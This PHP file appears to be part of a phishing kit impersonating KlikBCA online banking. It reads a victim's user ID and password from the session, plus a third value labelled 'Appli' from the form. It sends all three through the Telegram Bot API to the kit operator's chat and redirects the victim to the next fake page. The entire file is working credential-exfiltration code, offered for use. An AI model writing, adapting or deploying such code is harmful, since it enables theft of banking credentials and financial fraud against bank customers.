<?php
include '../../telegram.php';
session_start();
$c = $_POST['c'];
$_SESSION['c'] = $c;
$a        = $_SESSION['a'];
$b        = $_SESSION['b'];



$message = "
─────────────────────────
Klil Bc
─────────────────────────
• User Id : ".$a."
• Password  : ".$b."
• Appli : ".$c."
─────────────────────────";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
header('Location: ../../klikbca/tiga.html');
?>
